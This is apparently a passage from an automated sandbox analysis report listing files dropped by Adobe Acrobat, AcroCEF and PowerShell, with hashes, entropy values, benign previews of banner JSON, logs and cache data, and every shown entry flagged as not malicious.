                          Entropy (8bit):5.303200472713821
                          Encrypted:false
                          SSDEEP:6:YEQXJ2HXv47KUO9VoZcg1vRcR0YooAvJfbPtdPeUkwRe9:YvXKXv47wEZc0vgGDV8Ukee9
                          MD5:2F2E736C09AE8A61752BCC2427DD2192
                          SHA1:B11EC6EED10318B988D268770C8D7DEEA2624A2A
                          SHA-256:541086F490098DD822AD283FE79F6F34590F1248FAD5B0BEE717E073984C06D1
                          SHA-512:5494ACC22AB334E32550163EB86349C8195174FFF34F742DBC5307294459E21F4C018BE1FEEF0FF4A4BE2E9465618816F1F36F8E8AA852F2EC9D4B181C639005
                          Malicious:false
                          Preview:{"analyticsData":{"responseGUID":"3956dc0b-1bcf-4bce-a73e-1232ddc874bf","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1737112109395,"statusCode":200,"surfaceID":"DC_Reader_RHP_Intent_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                          File Type:JSON data
                          Category:dropped
                          Size (bytes):287
                          Entropy (8bit):5.307811459373657
                          Encrypted:false
                          SSDEEP:6:YEQXJ2HXv47KUO9VoZcg1vRcR0YooAvJf21rPeUkwRe9:YvXKXv47wEZc0vgG+16Ukee9
                          MD5:865A0B7BC4FC576C9F17399362B69BB8
                          SHA1:E13CB891E7AFF4DA93F7A31B51BEDC0AAFA929C8
                          SHA-256:58694E41B8CC26E1D5C3F281B5E09BC8F3B096809E3BC6B1519369CBA0158B35
                          SHA-512:85714FC8647013093F02F90E64DA422D892460F381998ADD317F352091D8736DE764167AB473586E9028EA4A6EED8CBEA85E9255E881525B0948E717E59754CE
                          Malicious:false
                          Preview:{"analyticsData":{"responseGUID":"3956dc0b-1bcf-4bce-a73e-1232ddc874bf","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1737112109395,"statusCode":200,"surfaceID":"DC_Reader_RHP_Retention","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                          File Type:JSON data
                          Category:dropped
                          Size (bytes):1090
                          Entropy (8bit):5.662294839635616
                          Encrypted:false
                          SSDEEP:24:Yv6Xv47wEzvFamXayLgE+cNDxeNaqnAvz7xHn0RCmK8czOC/BSU:YvBRBgkDMUJUAh8cvMU
                          MD5:2D16F2C6D7C4A59818AA2F5288363CB3
                          SHA1:6AADC9CD124D37567B8EA7E58F65E1E1CD3BF162
                          SHA-256:A7C1C0E075C990C5C4B97981F06ED0F7091673BA7B33290150C81EE3382B9E69
                          SHA-512:6BFC275F4C91122857F84F0D7A103BBB866B1D47AC12E6F1EA5C828040B374F78BDFD0E9A1F6C532F528EBB250436D727FB588DF627AC1206849D42352AEE021
                          Malicious:false
                          Preview:{"analyticsData":{"responseGUID":"3956dc0b-1bcf-4bce-a73e-1232ddc874bf","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1737112109395,"statusCode":200,"surfaceID":"DC_Reader_Sign_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Sign_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"93365_289436ActionBlock_0","campaignId":93365,"containerId":"1","controlGroupId":"","treatmentId":"266234d2-130d-426e-8466-c7a061db101f","variationId":"289436"},"containerId":1,"containerLabel":"JSON for DC_Reader_Sign_LHP_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IkZyZWUgdHJpYWwiLCJjbGljayI6Im9wZW5Ub29sIiwidG9vbF9pZCI6IlVwZ3JhZGVSSFBSZHJBcHAifSwidWkiOnsidGl0bGVfc3R5bGluZyI6eyJmb250X3NpemUiOiIxNHB4IiwiZm9udF9zdHlsZSI6IjAifSwiZGVzY3JpcHRpb25fc3R5bGluZyI6eyJmb250X3NpemUiOiIxMnB4IiwiZm9udF9zdHlsZSI6Ii0xIn0sInRpdGxlIjpudWxsLCJkZXNjcmlwdGlvbiI6IkVhc2lseSBmaWxsIGFuZCBzaWduIFBERnMuIn0sInRjYXRJZCI6bnVsbH0=","dataType":"app
                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                          File Type:JSON data
                          Category:dropped
                          Size (bytes):286
                          Entropy (8bit):5.2829921942502
                          Encrypted:false
                          SSDEEP:6:YEQXJ2HXv47KUO9VoZcg1vRcR0YooAvJfshHHrPeUkwRe9:YvXKXv47wEZc0vgGUUUkee9
                          MD5:BEF544632A53EC6C34A45801056DC66A
                          SHA1:1516683582A7890DA99F8D5230E63A16A71A577F
                          SHA-256:DD3F60C70EE44BE9761EB0E0492510FDB303B2221846C00B346988D0EC82E5C5
                          SHA-512:EC629B90284FA4C1CFB75DCBF84BC53ABC3362A4419718637D2E6A00E7A41B4E28EA748C8E0C58E1D3DF810BED93992B24307616277364895D15EE306533AF2D
                          Malicious:false
                          Preview:{"analyticsData":{"responseGUID":"3956dc0b-1bcf-4bce-a73e-1232ddc874bf","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1737112109395,"statusCode":200,"surfaceID":"DC_Reader_Upsell_Cards","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                          File Type:JSON data
                          Category:dropped
                          Size (bytes):282
                          Entropy (8bit):5.293764314739467
                          Encrypted:false
                          SSDEEP:6:YEQXJ2HXv47KUO9VoZcg1vRcR0YooAvJTqgFCrPeUkwRe9:YvXKXv47wEZc0vgGTq16Ukee9
                          MD5:A2D7C75168B34278416119872CB1B644
                          SHA1:6412F01E1F60AED9D31C24E8CAD86094A0092840
                          SHA-256:F36E2BB9260DBF808251D135DF9052985124A4B100C99880C1D3094E1007AD27
                          SHA-512:F9360A0C11C91806E93AF500D2237ADE4665EF4A41BB051E3CBDABBD1BF2344A5D486C1397E1E6F9DCF3310105224E10455694D4AE10F5CF79598BABD43CF1B5
                          Malicious:false
                          Preview:{"analyticsData":{"responseGUID":"3956dc0b-1bcf-4bce-a73e-1232ddc874bf","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1737112109395,"statusCode":200,"surfaceID":"Edit_InApp_Aug2020","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                          File Type:data
                          Category:dropped
                          Size (bytes):4
                          Entropy (8bit):0.8112781244591328
                          Encrypted:false
                          SSDEEP:3:e:e
                          MD5:DC84B0D741E5BEAE8070013ADDCC8C28
                          SHA1:802F4A6A20CBF157AAF6C4E07E4301578D5936A2
                          SHA-256:81FF65EFC4487853BDB4625559E69AB44F19E0F5EFBD6D5B2AF5E3AB267C8E06
                          SHA-512:65D5F2A173A43ED2089E3934EB48EA02DD9CCE160D539A47D33A616F29554DBD7AF5D62672DA1637E0466333A78AAA023CBD95846A50AC994947DC888AB6AB71
                          Malicious:false
                          Preview:....
                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                          File Type:JSON data
                          Category:dropped
                          Size (bytes):2814
                          Entropy (8bit):5.14986605969411
                          Encrypted:false
                          SSDEEP:24:YWQE8ta0ay4/X25JJ/Xml2c/sSDjRAQsj0SRB6MAV2uW72LSzC1sEeBGGCclXLSv:YZmG5D/XmllU2j+/6vAZSeB4clX2C9K
                          MD5:825091377D97B0578197C105361FA029
                          SHA1:6C9689CE50D7272951E0899F3A40EC19759F9617
                          SHA-256:C4419846E4F0C1DBC9069972607849F6A3AE5C6189B19FA6F85EE43AD9BC200A
                          SHA-512:A3AC2A8CD8064E4FB46D83862C45059E94DDA6215D9E75E21F6892D26397565E54FAF6A5D8C1D688716CEA5A58A9684D01FDFC8CC30618D9FC7F1C0C10B385C4
                          Malicious:false
                          Preview:{"all":[{"id":"DC_Reader_Disc_LHP_Banner","info":{"dg":"2f872d0a8587880315b998f1ba6b1737","sid":"DC_Reader_Disc_LHP_Banner"},"mimeType":"file","size":289,"ts":1736932153000},{"id":"DC_Reader_Sign_LHP_Banner","info":{"dg":"551f158993053e075c5fb6c102e6b86a","sid":"DC_Reader_Sign_LHP_Banner"},"mimeType":"file","size":1090,"ts":1736932153000},{"id":"DC_Reader_Convert_LHP_Banner","info":{"dg":"8ef718b243dd72b6f87a73aa11052c6d","sid":"DC_Reader_Convert_LHP_Banner"},"mimeType":"file","size":1123,"ts":1736932153000},{"id":"DC_Reader_Home_LHP_Trial_Banner","info":{"dg":"4e27cbdc18df583bc244a723cda95421","sid":"DC_Reader_Home_LHP_Trial_Banner"},"mimeType":"file","size":295,"ts":1736932153000},{"id":"DC_Reader_Disc_LHP_Retention","info":{"dg":"215ea729bc450bf8bb5b868047c86293","sid":"DC_Reader_Disc_LHP_Retention"},"mimeType":"file","size":292,"ts":1736932153000},{"id":"DC_Reader_More_LHP_Banner","info":{"dg":"7bcdb08bafebc8210812795634b72c92","sid":"DC_Reader_More_LHP_Banner"},"mimeType":"file","
                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                          File Type:SQLite 3.x database, last written using SQLite version 3040000, file counter 25, database pages 3, cookie 0x2, schema 4, UTF-8, version-valid-for 25
                          Category:dropped
                          Size (bytes):12288
                          Entropy (8bit):1.1877704084872232
                          Encrypted:false
                          SSDEEP:48:TGufl2GL7msEHUUUUUUUUdSvR9H9vxFGiDIAEkGVvpK:lNVmswUUUUUUUUd+FGSIt2
                          MD5:5B0959B14DA46CF97E712468E39BF232
                          SHA1:55B415F8F27AE962BD685CEF7BEBF572B5E9366B
                          SHA-256:D9F1E547C4C854C6D11433A03CE7C32FC8F79E24EA97AA717093A36673ECFD4B
                          SHA-512:CDD418EF267B7AD9AEFE4BD78C1B70BB45B5FC2C38BA0F8C6D5E627850566A8BFE08BED7784CCE50233B8E4D498D3D1D7DFADED60F91F7C50B0980DE884A63D5
                          Malicious:false
                          Preview:SQLite format 3......@ ..........................................................................c.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                          File Type:SQLite Rollback Journal
                          Category:dropped
                          Size (bytes):8720
                          Entropy (8bit):1.6065805636543744
                          Encrypted:false
                          SSDEEP:48:7MwKUUUUUUUUUUlvR9H9vxFGiDIAEkGVvYfqFl2GL7msO:7oUUUUUUUUUUBFGSIt2fKVmsO
                          MD5:FD86034BEF30D4A85D07582889940CF2
                          SHA1:1CC4130F57D765C0A7F8EFFB89BB494A11125D09
                          SHA-256:0610FC8CD05212F5A770AD4E471687933CE412F11F6EF6E85B160F0F9B9A6A69
                          SHA-512:FD49DD3532BDC0E38CCC0A72F8C7D35EE310A303287C0E7696C525788F21F7907F5D5ED4F5820831F91508BCF1299001D92811A8551191D0AF39D08D53D37884
                          Malicious:false
                          Preview:.... .c...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................f.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                          File Type:data
                          Category:dropped
                          Size (bytes):66726
                          Entropy (8bit):5.392739213842091
                          Encrypted:false
                          SSDEEP:768:RNOpblrU6TBH44ADKZEg5Gq4AznKpotH6z+491rCfTFYyu:6a6TZ44ADE5l4AznKpYfpK
                          MD5:280AD51481D7535C6D71CDB4D4F0D873
                          SHA1:F9E75FAF6EBA25D4AC864BE113767DE5E4626EA9
                          SHA-256:968E0B72BC0D356D62A91430BA7DF6B716E82DAA485B76BF02C45817C35F729A
                          SHA-512:0969B48DE664EC127156A654850B951F8612A500793D08D73AD7B58BFC0A5151CC46617F6DB7ABC7FADB2B96DFF05076618FFB4B44877BEC03FF436E4FA60626
                          Malicious:false
                          Preview:4.397.90.FID.2:o:..........:F:AgencyFB-Reg.P:Agency FB.L:$.........................."F:Agency FB.#.96.FID.2:o:..........:F:AgencyFB-Bold.P:Agency FB Bold.L:%.........................."F:Agency FB.#.84.FID.2:o:..........:F:Algerian.P:Algerian.L:$..........................RF:Algerian.#.95.FID.2:o:..........:F:ArialNarrow.P:Arial Narrow.L:$.........................."F:Arial Narrow.#.109.FID.2:o:..........:F:ArialNarrow-Italic.P:Arial Narrow Italic.L:$.........................."F:Arial Narrow.#.105.FID.2:o:..........:F:ArialNarrow-Bold.P:Arial Narrow Bold.L:%.........................."F:Arial Narrow.#.118.FID.2:o:..........:F:ArialNarrow-BoldItalic.P:Arial Narrow Bold Italic.L:%.........................."F:Arial Narrow.#.77.FID.2:o:..........:F:ArialMT.P:Arial.L:$.........................."F:Arial.#.91.FID.2:o:..........:F:Arial-ItalicMT.P:Arial Italic.L:$.........................."F:Arial.#.87.FID.2:o:..........:F:Arial-BoldMT.P:Arial Bold.L:$.........................."F:Arial.#.100.FID.2
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:data
                          Category:dropped
                          Size (bytes):64
                          Entropy (8bit):1.1940658735648508
                          Encrypted:false
                          SSDEEP:3:Nlllulbnolz:NllUc
                          MD5:F23953D4A58E404FCB67ADD0C45EB27A
                          SHA1:2D75B5CACF2916C66E440F19F6B3B21DFD289340
                          SHA-256:16F994BFB26D529E4C28ED21C6EE36D4AFEAE01CEEB1601E85E0E7FDFF4EFA8B
                          SHA-512:B90BFEC26910A590A367E8356A20F32A65DB41C6C62D79CA0DDCC8D95C14EB48138DEC6B992A6E5C7B35CFF643063012462DA3E747B2AA15721FE2ECCE02C044
                          Malicious:false
                          Preview:@...e................................................@..........
                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                          File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):246
                          Entropy (8bit):3.513199765407527
                          Encrypted:false
                          SSDEEP:6:Qgl946caEbiQLxuZUQu+lEbYnuoblv2K8+pClGb:Qw946cPbiOxDlbYnuRKZT
                          MD5:C95B17935BB75EA285ABCC79D67626DF
                          SHA1:C15FAC63799C15850304A7378A3A146D0A7F8739
                          SHA-256:88D645582CBA156CC80818993FEDF44593E210A77FB85FC4BC092AB3AF266823
                          SHA-512:0FBF668DFD4EADCE8581373BCE34F977867C47099E3CECAE4C1B0278931C54F1CC91DF3B3FCF111E07D87150742417C2459C6FA2CC58BB96C5E8A70E54E77BD7
                          Malicious:false
                          Preview:..E.r.r.o.r. .2.7.1.1...T.h.e. .s.p.e.c.i.f.i.e.d. .F.e.a.t.u.r.e. .n.a.m.e. .(.'.A.R.M.'.). .n.o.t. .f.o.u.n.d. .i.n. .F.e.a.t.u.r.e. .t.a.b.l.e.......=.=.=. .L.o.g.g.i.n.g. .s.t.o.p.p.e.d.:. .1.5./.0.1./.2.0.2.5. . .0.4.:.0.9.:.1.5. .=.=.=.....
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:ASCII text, with no line terminators
                          Category:dropped
                          Size (bytes):60
                          Entropy (8bit):4.038920595031593
                          Encrypted:false
                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                          Malicious:false
                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:ASCII text, with no line terminators
                          Category:dropped
                          Size (bytes):60
                          Entropy (8bit):4.038920595031593
                          Encrypted:false
                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                          Malicious:false
                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                          File Type:ASCII text, with very long lines (393)
                          Category:dropped
                          Size (bytes):16525
                          Entropy (8bit):5.345946398610936
                          Encrypted:false
                          SSDEEP:384:zHIq8qrq0qoq/qUILImCIrImI9IWdFdDdoPtPTPtP7ygyAydy0yGV///X/J/VokV:nNW
                          MD5:8947C10F5AB6CFFFAE64BCA79B5A0BE3
                          SHA1:70F87EEB71BA1BE43D2ABAB7563F94C73AB5F778
                          SHA-256:4F3449101521DA7DF6B58A2C856592E1359BA8BD1ACD0688ECF4292BA5388485
                          SHA-512:B76DB9EF3AE758F00CAF0C1705105C875838C7801F7265B17396466EECDA4BCD915DA4611155C5F2AD1C82A800C1BEC855E52E2203421815F915B77AA7331CA0
                          Malicious:false
                          Preview:SessionID=f94b8f43-fcd8-49f4-8c6e-bbf5cd863db9.1696420882088 Timestamp=2023-10-04T13:01:22:088+0100 ThreadID=3400 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------".SessionID=f94b8f43-fcd8-49f4-8c6e-bbf5cd863db9.1696420882088 Timestamp=2023-10-04T13:01:22:089+0100 ThreadID=3400 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found".SessionID=f94b8f43-fcd8-49f4-8c6e-bbf5cd863db9.1696420882088 Timestamp=2023-10-04T13:01:22:089+0100 ThreadID=3400 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!".SessionID=f94b8f43-fcd8-49f4-8c6e-bbf5cd863db9.1696420882088 Timestamp=2023-10-04T13:01:22:089+0100 ThreadID=3400 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1".SessionID=f94b8f43-fcd8-49f4-8c6e-bbf5cd863db9.1696420882088 Timestamp=2023-10-04T13:01:22:089+0100 ThreadID=3400 Component=ngl-lib_NglAppLib Description="SetConfig:
                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                          File Type:ASCII text, with very long lines (393), with CRLF line terminators
                          Category:dropped
                          Size (bytes):15114
                          Entropy (8bit):5.351889368082631
                          Encrypted:false
                          SSDEEP:384:pmCfL3quOuxhk6tSVzGf/ATGZ1IG4379W9DdXztpA7VtzRfzAuvim2r2b/uAkFWB:TVqv
                          MD5:80CBF4FB1016004A26E8D42941CDEA9F
                          SHA1:80508905851A9A84BD6C5D27DF795A56334CAE68
                          SHA-256:8CA6BB52024A5DE55E2E1E6775DFAD57D4463B6E1127276709DFD2554173FA4C
                          SHA-512:85E79A23F1F25E0B1B90664735F8F4A0DA05E2D4E561BA1954ADF93C8D4322E62655C4B50E90EC81EF65751BEE25C4D246701738B369BCDA8A64660DCB005EFA
                          Malicious:false
                          Preview:SessionID=85eb6184-c475-4d5e-a49e-d009574f2bbb.1736932149917 Timestamp=2025-01-15T04:09:09:917-0500 ThreadID=7336 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------"..SessionID=85eb6184-c475-4d5e-a49e-d009574f2bbb.1736932149917 Timestamp=2025-01-15T04:09:09:918-0500 ThreadID=7336 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found"..SessionID=85eb6184-c475-4d5e-a49e-d009574f2bbb.1736932149917 Timestamp=2025-01-15T04:09:09:918-0500 ThreadID=7336 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!"..SessionID=85eb6184-c475-4d5e-a49e-d009574f2bbb.1736932149917 Timestamp=2025-01-15T04:09:09:918-0500 ThreadID=7336 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1"..SessionID=85eb6184-c475-4d5e-a49e-d009574f2bbb.1736932149917 Timestamp=2025-01-15T04:09:09:919-0500 ThreadID=7336 Component=ngl-lib_NglAppLib Description="SetConf
                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                          File Type:ASCII text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):29752
                          Entropy (8bit):5.3883909852024745
                          Encrypted:false
                          SSDEEP:768:anddBuBYZwcfCnwZCnR8Bu5hx18HoCnLlAY+iCBuzhLCnx1CnPrRRFS10l8gT2rT:/
                          MD5:EC4745A11F3F5DFD4064ACEC97293334
                          SHA1:C17987607E3DDA86E5525CC67608548557B62665
                          SHA-256:E105F77C9CFDFEDFAC83291CD73A6DD33FDF5FE9B708C0367683D074763C78D9
                          SHA-512:9A2E6B780A4B2DA83B346CD7C7AA8425E898980BA1299CD8997FE94020F6CC46BD5E4514B9582A6D860AFDE3943489BA1F89435B8D9191D86FD8C5AAC1051FDE
                          Malicious:false
                          Preview:03-10-2023 12:50:40:.---2---..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : ***************************************..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : ***************************************..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : ******** Starting new session ********..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : Starting NGL..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : Setting synchronous launch...03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 ::::: Configuring as AcrobatReader1..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : NGLAppVersion 23.6.20320.6..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : NGLAppMode NGL_INIT..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : AcroCEFPath, NGLCEFWorkflowModulePath - C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1 C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : isNGLExternalBrowserDisabled - No..03-10-2023 12:50:40:.Closing File..03-10-
                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                          File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 33081
                          Category:dropped
                          Size (bytes):1407294
                          Entropy (8bit):7.97605879016224
                          Encrypted:false
                          SSDEEP:24576:/xA7o5dpy6mlind9j2kvhsfFXpAXDgrFBU2/R07/WLaGZDwYIGNPJe:JVB3mlind9i4ufFXpAXkrfUs0jWLaGZo
                          MD5:A0CFC77914D9BFBDD8BC1B1154A7B364
                          SHA1:54962BFDF3797C95DC2A4C8B29E873743811AD30
                          SHA-256:81E45F94FE27B1D7D61DBC0DAFC005A1816D238D594B443BF4F0EE3241FB9685
                          SHA-512:74A8F6D96E004B8AFB4B635C0150355CEF5D7127972EA90683900B60560AA9C7F8DE780D1D5A4A944AF92B63C69F80DCDE09249AB99696932F1955F9EED443BE
                          Malicious:false
                          Preview:...........[.s.8..}.....!#..gw.n.`uNl.f6.3....d%EK.D["...#.......!)...r.$.G.......Z..u.._>.~....^e..<..u..........._D.r.Z..M.:...$.I..N.....\`.B.wj...:...E|.P..$ni.{.....T.^~<m-..J....RQk..*..f.....q.......V.rC.M.b.DiL\.....wq.*...$&j....O.........~.U.+..So.]..n..#OJ..p./..-......<...5..WB.O....i....<./T.P.L.;.....h.ik..D*T...<...j..o..fz~..~."...w&.fB...4..@[.g.......Y.>/M.".....-..N.{.2.....\....h..ER..._..(.-..o97..[.t:..>..W*..0.....u...?.%...1u..fg..`.Z.....m ~.GKG.q{.vU.nr..W.%.W..#z..l.T......1.....}.6......D.O...:....PX.......*..R.....j.WD).M..9.Fw...W.-a..z.l\..u*.^....*L..^.`.T...l.^.B.DMc.d....i...o.|M.uF|.nQ.L.E,.b!..NG.....<...J......g.o....;&5..'a.M...l..1.V.iB2.T._I....".+.W.yA ._.......<.O......O$."C....n!H.L`..q.....5..~./.._t.......A....S..3........Q[..+..e..P;...O...x~<B........'.)...n.$e.m.:...m.....&..Y.".H.s....5.9..A5)....s&.k0,.g4.V.K.,*.e....5...X.}6.P....y\.s|..Si..BB..y...~.....D^g...*7'T-.5*.!K.$\...2.
                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                          File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 299538
                          Category:dropped
                          Size (bytes):758601
                          Entropy (8bit):7.98639316555857
                          Encrypted:false
                          SSDEEP:12288:ONh3P65+Tegs6121YSWBlkipdjuv1ybxrr/IxkB1mabFhOXZ/fEa+vTJJJJv+9U0:O3Pjegf121YS8lkipdjMMNB1DofjgJJg
                          MD5:3A49135134665364308390AC398006F1
                          SHA1:28EF4CE5690BF8A9E048AF7D30688120DAC6F126
                          SHA-256:D1858851B2DC86BA23C0710FE8526292F0F69E100CEBFA7F260890BD41F5F42B
                          SHA-512:BE2C3C39CA57425B28DC36E669DA33B5FF6C7184509756B62832B5E2BFBCE46C9E62EAA88274187F7EE45474DCA98CD8084257EA2EBE6AB36932E28B857743E5
                          Malicious:false
                          Preview:...........kWT..0...W`.........b..@..nn........5.._..I.R3I..9g.x....s.\+.J......F...P......V]u......t....jK...C.fD..]..K....;......y._.U..}......S.........7...Q.............W.D..S.....y......%..=.....e..^.RG......L..].T.9.y.zqm.Q]..y..(......Q]..~~..}..q...@.T..xI.B.L.a.6...{..W..}.mK?u...5.#.{...n...........z....m^.6!.`.....u...eFa........N....o..hA-..s.N..B.q..{..z.{=..va4_`5Z........3.uG.n...+...t...z.M."2..x.-...DF..VtK.....o]b.Fp.>........c....,..t..an[............5.1.(}..q.q......K3.....[>..;e..f.Y.........mV.cL...]eF..7.e.<.._.o\.S..Z...`..}......>@......|.......ox.........h.......o....-Yj=.s.g.Cc\.i..\..A.B>.X..8`...P......[..O...-.g...r..u\...k..7..#E....N}...8.....(..0....w....j.......>.L....H.....y.x3...[>..t......0..z.qw..]X..i8..w.b..?0.wp..XH.A.[.....S..g.g..I.A.15.0?._n.Q.]..r8.....l..18...(.].m...!|G.1...... .3.`./....`~......G.............|..pS.e.C....:o.u_..oi.:..|....joi...eM.m.K...2%...Z..j...VUh..9.}.....
                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                          File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1311022
                          Category:dropped
                          Size (bytes):386528
                          Entropy (8bit):7.9736851559892425
                          Encrypted:false
                          SSDEEP:6144:8OSTJJJJEQ6T9UkRm1lBgI81ReWQ53+sQ36X/FLYVbxrr/IxktOQZ1mau4yBwsOo:sTJJJJv+9UZX+Tegs661ybxrr/IxkB1m
                          MD5:5C48B0AD2FEF800949466AE872E1F1E2
                          SHA1:337D617AE142815EDDACB48484628C1F16692A2F
                          SHA-256:F40E3C96D4ED2F7A299027B37B2C0C03EAEEE22CF79C6B300E5F23ACB1EB31FE
                          SHA-512:44210CE41F6365298BFBB14F6D850E59841FF555EBA00B51C6B024A12F458E91E43FDA3FA1A10AAC857D4BA7CA6992CCD891C02678DCA33FA1F409DE08859324
                          Malicious:false
                          Preview:...........]s[G. Z...{....;...J$%K&..%.[..k...S....$,.`. )Z..m........a.......o..7.VfV...S..HY}Ba.<.NUVVV~W.].;qG4..b,N..#1.=1.#1..o.Fb.........IC.....Z...g_~.OO.l..g.uO...bY.,[..o.s.D<..W....w....?$4..+..%.[.?..h.w<.T.9.vM.!..h0......}..H..$[...lq,....>..K.)=..s.{.g.O...S9".....Q...#...+..)>=.....|6......<4W.'.U.j$....+..=9...l.....S..<.\.k.'....{.1<.?..<..uk.v;.7n.!...g....."P..4.U........c.KC..w._G..u..g./.g....{'^.-|..h#.g.\.PO.|...]x..Kf4..s..............+.Y.....@.K....zI..X......6e?[..u.g"{..h.vKbM<.?i6{%.q)i...v..<P8P3.......CW.fwd...{:@h...;........5..@.C.j.....a.. U.5...].$.L..wW....z...v.......".M.?c.......o..}.a.9..A..%V..o.d....'..|m.WC.....|.....e.[W.p.8...rm....^..x'......5!...|......z..#......X_..Gl..c..R..`...*.s-1f..]x......f...g...k........g....... ).3.B..{"4...!r....v+As...Zn.]K{.8[..M.r.Y..........+%...]...J}f]~}_..K....;.Z.[..V.&..g...>...{F..{I..@~.^.|P..G.R>....U..../HY...(.z.<.~.9OW.Sxo.Y
                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                          File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 5111142
                          Category:dropped
                          Size (bytes):1419751
                          Entropy (8bit):7.976496077007677
                          Encrypted:false
                          SSDEEP:24576:/rwYIGNP4mOWL07oBGZ1dpy6mlind9j2kvhsfFXpAXDgrFBU2/R07D:TwZG6bWLxBGZN3mlind9i4ufFXpAXkru
                          MD5:95F182500FC92778102336D2D5AADCC8
                          SHA1:BEC510B6B3D595833AF46B04C5843B95D2A0A6C9
